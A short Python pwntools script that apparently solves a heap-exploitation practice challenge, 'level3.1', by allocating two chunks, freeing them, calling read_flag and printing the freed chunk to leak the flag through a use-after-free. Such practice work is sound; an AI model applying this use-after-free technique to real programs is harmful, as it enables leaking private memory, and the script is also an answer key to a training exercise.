from pwn import *
r = process("./level3.1")
r.read()
r.sendline("malloc")
r.sendline("0")
r.sendline("651")
r.sendline("malloc")
r.sendline("1")
r.sendline("651")
r.sendline("free")
r.sendline("0")
r.sendline("free")
r.sendline("1")
r.sendline("read_flag")
r.sendline("puts")
r.sendline("0")
r.interactive()
